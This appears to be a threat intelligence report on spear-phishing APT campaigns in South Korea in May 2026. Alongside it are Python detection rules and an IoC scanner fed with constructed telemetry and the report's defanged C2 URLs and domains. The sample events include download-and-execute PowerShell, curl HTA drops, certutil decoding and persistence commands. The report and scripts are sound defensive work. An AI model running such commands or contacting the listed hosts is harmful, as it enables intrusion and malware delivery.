May 2026 Threat Trend Report on APT Attacks (South Korea)

Overview

AhnLab monitored APT (Advanced Persistent Threat) attacks—covert, sustained targeted attacks—using its own infrastructure. This report summarizes the types and statistics of domestic APT attacks identified during May 2026, discusses the characteristics of each type, and gives an overview of AhnLab's response.

Trends of APT Attacks in South Korea

Most of the APT attacks detected in South Korea were distributed via spear phishing (targeted phishing aimed at specific individuals or groups). Attacks using LNK files accounted for the highest proportion, and attacks using CHM files were also detected.

Spear Phishing-Based Attacks

  • Type A uses malicious PowerShell commands in an LNK file to connect to an external URL, download additional files, and execute AutoIt malware. It ensures persistence by registering a Task Scheduler job and performs functions such as command execution, directory querying, file uploading, and file downloading.
  • Type B uses curl.exe (Windows' default command-line download tool) to download and execute a malicious HTA file in the %TEMP% directory. It is distributed via GitHub repositories or Google Drive and loads infostealers (malware designed to steal information), keyloggers (malware that captures keystrokes), and backdoors into memory.
  • Type C uses PowerShell code embedded within the LNK file to create and execute Base64-encoded data in %TEMP%, then downloads decoy files and malicious scripts from a GitHub repository. It creates a Task Scheduler entry to ensure persistence, deploys XenoRAT-type malware, and exfiltrates system information.
  • Type D uses XML, JS, and PowerShell scripts embedded within the LNK file to generate data and register a Task Scheduler job. It then executes a malicious Python script via a BAT file and a compressed file, and launches a backdoor capable of executing remote commands and controlling files.
  • Type E includes decoy files and malicious PowerShell commands within an LNK file that is disguised as a resume or document file. It generates VBS, BAT, and PowerShell scripts and registers them with the Task Scheduler; after executing a loader using the DLL side-loading technique, it injects a backdoor into a legitimate process.
  • Type F uses CMD and PowerShell commands within the LNK file to download additional files. It copies curl.exe to %TEMP%, executes a decoy PDF and a BAT downloader, installs a Python package, and then registers pythonw.exe, disguised as a legitimate file, in the Task Scheduler. Finally, the Python backdoor executes commands received from the threat actor's server and transmits the results.
  • Type Unknown refers to cases distributed via spear phishing that do not fall under the preceding types.

Attacks Utilizing JSE

  • Type G creates a malicious DLL and a decoy document in the %ProgramData% directory and loads the DLL into memory using regsvr32.exe (a legitimate Windows tool). This DLL is a backdoor capable of performing malicious activities such as information theft.

Attacks Using CHM

  • Type H involves an HTML script within a CHM help file that executes a PowerShell command, generates a Base64-encoded VBScript, decodes it using certutil.exe, and runs it via wscript.exe. It then connects to an external C2 server to receive and execute additional scripts.
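The technique descriptions above (Types A through H in the spear phishing, JSE and CHM sections) share a small set of observable host behaviours: a shortcut launched from Explorer spawning a downloader, curl.exe dropping an HTA into %TEMP%, certutil.exe decoding a script, a script host running out of a user-writable directory, a scheduled task pointing at a user-writable binary, and regsvr32.exe loading a DLL from %ProgramData%. The script below is an added example written for this page, not AhnLab's detection logic: it runs those rules over constructed Sysmon-style process-creation records. Every event, path, user name and rule name in it is an assumption.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """A process-creation record (Sysmon event 1 / Windows 4688 style); all values constructed."""
    eid: int
    parent_image: str
    image: str
    command_line: str


# Directories a standard user can write to; the report's samples stage files in %TEMP% and %ProgramData%.
USER_WRITABLE = re.compile(r"\\(temp|appdata|programdata|users\\public)\\", re.I)
# Download primitives seen in the LNK-embedded PowerShell/CMD commands.
FETCH = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|https?://", re.I)


def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lnk_spawned_downloader(e: ProcEvent) -> bool:
    # Types A/C/F: a double-clicked LNK makes Explorer spawn cmd/powershell that fetches a payload
    return (_base(e.parent_image) == "explorer.exe"
            and _base(e.image) in {"powershell.exe", "cmd.exe"}
            and bool(FETCH.search(e.command_line)))


def curl_drops_hta(e: ProcEvent) -> bool:
    # Type B: curl.exe writes an HTA into %TEMP%
    return (_base(e.image) == "curl.exe"
            and bool(re.search(r"(%temp%|\\temp)\\\S*\.hta", e.command_line, re.I)))


def certutil_decode(e: ProcEvent) -> bool:
    # Type H: certutil.exe used to turn a Base64 blob into a script
    return _base(e.image) == "certutil.exe" and re.search(r"-decode(hex)?\b", e.command_line, re.I) is not None


def script_host_from_user_dir(e: ProcEvent) -> bool:
    # Types B/D/E/H: wscript/cscript/mshta executing a script from a user-writable directory
    return (_base(e.image) in {"wscript.exe", "cscript.exe", "mshta.exe"}
            and bool(USER_WRITABLE.search(e.command_line)))


def task_persists_user_dir_binary(e: ProcEvent) -> bool:
    # Types A/C/D/E/F: schtasks /create whose action lives in a user-writable path (e.g. a pythonw.exe copy)
    return (_base(e.image) == "schtasks.exe"
            and re.search(r"/create\b", e.command_line, re.I) is not None
            and bool(USER_WRITABLE.search(e.command_line)))


def regsvr32_programdata_dll(e: ProcEvent) -> bool:
    # Type G: regsvr32.exe loading a DLL dropped in %ProgramData%
    return _base(e.image) == "regsvr32.exe" and bool(re.search(r"\\programdata\\\S+\.dll", e.command_line, re.I))


RULES = [lnk_spawned_downloader, curl_drops_hta, certutil_decode,
         script_host_from_user_dir, task_persists_user_dir_binary, regsvr32_programdata_dll]


def evaluate(events):
    """Return (event id, rule name) for every rule that fires, in event order."""
    return [(e.eid, rule.__name__) for e in events for rule in RULES if rule(e)]


# Constructed sample telemetry: six events that mirror the report's behaviours, three benign controls.
TEMP = r"C:\Users\alice\AppData\Local\Temp"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent(1, r"C:\Windows\explorer.exe", PS,
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s.txt')\""),
    ProcEvent(2, CMD, r"C:\Windows\System32\curl.exe", f"curl.exe -s -o {TEMP}\\upd.hta https://example.invalid/upd"),
    ProcEvent(3, CMD, r"C:\Windows\System32\certutil.exe", f"certutil -decode {TEMP}\\blob.txt {TEMP}\\run.vbs"),
    ProcEvent(4, CMD, r"C:\Windows\System32\wscript.exe", f"wscript.exe {TEMP}\\run.vbs"),
    ProcEvent(5, CMD, r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn Updater /sc minute /mo 10 /tr "C:\Users\alice\AppData\Roaming\pythonw.exe"'),
    ProcEvent(6, CMD, r"C:\Windows\System32\regsvr32.exe", r"regsvr32 /s C:\ProgramData\cache\helper.dll"),
    # benign controls: the same binaries in ordinary use must not fire
    ProcEvent(7, r"C:\Windows\explorer.exe", PS, "powershell.exe -NoProfile -c Get-ChildItem C:\\"),
    ProcEvent(8, CMD, r"C:\Windows\System32\certutil.exe", r"certutil -hashfile C:\Users\alice\Downloads\setup.msi SHA256"),
    ProcEvent(9, r"C:\Windows\System32\services.exe", r"C:\Windows\System32\schtasks.exe",
              r"schtasks /create /tn Backup /sc daily /tr C:\Program Files\Backup\backup.exe"),
]

if __name__ == "__main__":
    for eid, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {eid}: {rule}")
```

The rules key on parent/child relationships and user-writable paths rather than on specific file names, because the report's samples rename legitimate tools (curl.exe, pythonw.exe) and drop scripts under arbitrary names; the benign controls show the price of that choice, which is that administrators running certutil -hashfile or a service creating a task under Program Files stay quiet while a task pointing into AppData does not.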

AhnLab Response Overview

The AhnLab product suite detects the malicious behaviors associated with this activity under the following detection names: Backdoor/Win.Agent.C5882829, Backdoor/Win.Mudsdoor.R773004, Downloader/LNK.Generic.SC314654, Downloader/PS.Agent, Downloader/PowerShell.Agent, Downloader/VBS.Agent.SC314574, Infostealer/Win.Agent.C5882827, Trojan/BAT.Agent.SC315175, Trojan/JS.Agent.SC314582, Trojan/JSE.Agent, Trojan/LNK.Agent, Trojan/LNK.Loader.SC315176, Trojan/Python.Agent, Trojan/VBS.Loader, Trojan/XML.Task, Trojan/XML.Schedule, Unwanted/Win.MeshCmd.R700828, and others. The report noted that even recently identified activities may not be detected, depending on the variant.

Conclusion

Domestic APT attacks often began with phishing emails disguised as work-related communications, and the malware combined LNK files, various scripts, and legitimate tools to execute backdoors and infostealers. This can lead to the leakage of user PC information, the takeover of control over infected systems, and the installation of additional malware. The report concluded that it is necessary to verify senders, refrain from opening files from unknown sources, check for vulnerable system settings, apply the latest patches for operating systems and web browsers, and keep V3 updated to the latest version.

MD5

076a8a0ae0c7d6270070b297c8617e2e
0896485da9a470d504fbaad570b16358
090cfb95ce9ff312c501d7f43267f9ff
0d2e61c8a5e6280e065b61e75b848c68
12391f66ee33d379108fd649a999e1a0

URL

http[:]//newtech[.]dkcreatech[.]com[:]57877/
https[:]//aplore[.]kesug[.]com/repmay/airbe[.]txt
https[:]//aplore[.]kesug[.]com/riln[.]php
https[:]//drive[.]google[.]com/uc?export=download&id=116azn_9buov3mksorbpk8_4zivvnbhzn
https[:]//drive[.]google[.]com/uc?export=download&id=15xkvt3twcqjercuhsuandcigmvvxsfqr

FQDN

univercity[.]library[.]boxathome[.]net
update[.]nstlog[.]store
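Using the defanged list above against logs requires refanging each value and matching it by the right field type: hashes against file-hash fields, FQDNs against DNS queries and proxy hosts (including subdomains beneath them), and URLs as complete normalized URLs. The script below is an added example written for this page, not AhnLab's tooling: it loads a subset of the report's own indicators and scans constructed proxy, DNS and EDR log lines. The log lines, their field names (url=, query=, md5=), the host name WS-07 and the benign Google Drive id are constructed.

```python
import re
from urllib.parse import urlsplit

# Defanged indicators copied from the report's IoC list above; the bracket notation is the page's own.
REPORT_IOCS = """
076a8a0ae0c7d6270070b297c8617e2e
0896485da9a470d504fbaad570b16358
http[:]//newtech[.]dkcreatech[.]com[:]57877/
https[:]//aplore[.]kesug[.]com/riln[.]php
https[:]//drive[.]google[.]com/uc?export=download&id=116azn_9buov3mksorbpk8_4zivvnbhzn
univercity[.]library[.]boxathome[.]net
update[.]nstlog[.]store
"""

MD5_RE = re.compile(r"^[0-9a-f]{32}$", re.I)


def refang(value: str) -> str:
    """Undo the usual defanging conventions ([.] [:] hxxp) so values compare against real logs."""
    return value.strip().replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


def normalize_url(url: str) -> str:
    """Lower-case scheme and host, keep port, path and query: the whole URL is the indicator."""
    p = urlsplit(url)
    return f"{p.scheme.lower()}://{p.netloc.lower()}{p.path or '/'}" + (f"?{p.query}" if p.query else "")


def load_iocs(text: str) -> dict:
    """Sort refanged indicators into typed sets by shape (32 hex chars, contains ://, otherwise a host)."""
    iocs = {"md5": set(), "url": set(), "fqdn": set()}
    for raw in text.splitlines():
        v = refang(raw)
        if not v:
            continue
        if MD5_RE.match(v):
            iocs["md5"].add(v.lower())
        elif "://" in v:
            iocs["url"].add(normalize_url(v))
        else:
            iocs["fqdn"].add(v.lower())
    return iocs


def host_matches(host: str, fqdns: set):
    """Return the listed FQDN that `host` equals or sits beneath, else None."""
    h = host.lower().rstrip(".")
    for f in fqdns:
        if h == f or h.endswith("." + f):
            return f
    return None


URL_FIELD = re.compile(r"\burl=(\S+)")
DNS_FIELD = re.compile(r"\bquery=(\S+)")
MD5_FIELD = re.compile(r"\bmd5=([0-9a-fA-F]{32})")


def scan(lines, iocs):
    """Return (line_no, ioc_type, matched_indicator) for every log line that hits the list."""
    hits = []
    for n, line in enumerate(lines, 1):
        if m := URL_FIELD.search(line):
            u = normalize_url(m.group(1))
            if u in iocs["url"]:
                hits.append((n, "url", u))
            elif f := host_matches(urlsplit(m.group(1)).hostname or "", iocs["fqdn"]):
                hits.append((n, "fqdn", f))
        if m := DNS_FIELD.search(line):
            if f := host_matches(m.group(1), iocs["fqdn"]):
                hits.append((n, "fqdn", f))
        if m := MD5_FIELD.search(line):
            if m.group(1).lower() in iocs["md5"]:
                hits.append((n, "md5", m.group(1).lower()))
    return hits


IOCS = load_iocs(REPORT_IOCS)

# Constructed log lines: four that should hit, two benign controls.
SAMPLE_LOG = [
    "2026-05-12T09:14:03Z proxy user=alice method=GET url=https://aplore.kesug.com/riln.php status=200",
    "2026-05-12T09:14:05Z dns client=10.0.0.7 query=UPDATE.NSTLOG.STORE. type=A",
    "2026-05-12T09:14:09Z dns client=10.0.0.7 query=cdn.update.nstlog.store type=A",
    r"2026-05-12T09:14:11Z edr host=WS-07 file=C:\Users\alice\AppData\Local\Temp\a.hta md5=076A8A0AE0C7D6270070B297C8617E2E",
    "2026-05-12T09:15:00Z proxy user=bob method=GET url=https://drive.google.com/uc?export=download&id=constructedbenignid000 status=200",
    "2026-05-12T09:15:02Z dns client=10.0.0.9 query=www.example.com type=A",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, IOCS):
        print(hit)
```

The Google Drive entries in the report are only meaningful as complete URLs: extracting their host would flag all Drive traffic, which is why the scan compares the whole normalized URL (scheme, host, port, path and query) and only takes hosts from the FQDN section, where a match on the domain or anything beneath it is intended.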